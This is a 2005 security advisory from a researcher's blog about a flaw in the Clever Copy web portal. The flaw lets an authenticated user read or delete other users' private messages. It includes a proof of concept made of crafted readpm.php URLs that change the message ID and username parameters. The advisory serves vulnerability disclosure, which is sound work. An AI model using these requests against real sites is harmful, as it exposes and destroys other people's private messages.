################################################
Clever Copy Unauthorized read & delete Private Messages
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-unauthorized-read-delete.html
vendor notify: yes exploit available:yes
OSVDB ID: 18509
Secunia : SA16236
BID:14397
################################################
Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System
Clever Copy contains a flaw that allows a Unauthorized read & delete Private Messages from other users.
The flaw is done wen a authenticated user try to access directly to a
especial url to gain unauthorized access to private messages.
############
versions
############
Clever Copy 2.0
Clever Copy 2.0a
###############
Solution
###############
No solution at this time !!
###################
Timeline
###################
Discovered: 25-07-2005
Vendor notify:26-07-2005
Disclosure:27-07-2005
###################
proof of concept
###################
First we must be logged for have access to private messages
and go to this url:
http://[victim]/readpm.php?op=read&ID=2&name=pruebas&user=waltrapass
or
http://[victim]/readpm.php?op=read&ID=2&user=waltrapass
and we look the message 2 from waltrapass user :)
op= read or del
id= id from message what we like to look
name= username of user was send the private message
( this is not necessary to view or delete a message)
user= username from user what we try to look their PM
for delete a message we can go to similar url:
http://[victim]/readpm.php?op=del&ID=2&name=pruebas&user=waltrapass
or
http://[victim]/readpm.php?op=del&ID=2&user=waltrapass
##################### €nd #############################
thnxs to estrella to be my ligth
thnxs to http://www.osvdb.org/
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
skip to main |
skip to sidebar
Security Research & Analisys:
Personal Blog where I expose my investigations,
advisores and some outstanding news on security.
Categories
Archives
-
►
2022
(2)
- ► November 2022 (1)
- ► October 2022 (1)
-
►
2013
(2)
- ► December 2013 (1)
- ► August 2013 (1)
-
►
2012
(5)
- ► April 2012 (1)
-
►
2011
(5)
- ► October 2011 (1)
- ► March 2011 (1)
-
►
2010
(18)
- ► December 2010 (2)
- ► September 2010 (1)
- ► March 2010 (1)
- ► February 2010 (1)
- ► January 2010 (1)
-
►
2009
(25)
- ► November 2009 (1)
- ► April 2009 (1)
- ► March 2009 (1)
- ► February 2009 (1)
-
►
2008
(24)
- ► August 2008 (9)
- ► April 2008 (1)
- ► March 2008 (1)
-
►
2007
(29)
- ► October 2007 (1)
- ► March 2007 (1)
-
►
2006
(14)
- ► August 2006 (1)
- ► February 2006 (1)
Browse
About:Me
My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com
La curiosidad es lo que hace
mover la mente...
Online Tools & Calculators
Posts
Lostmon Blogger © All Rights Reserved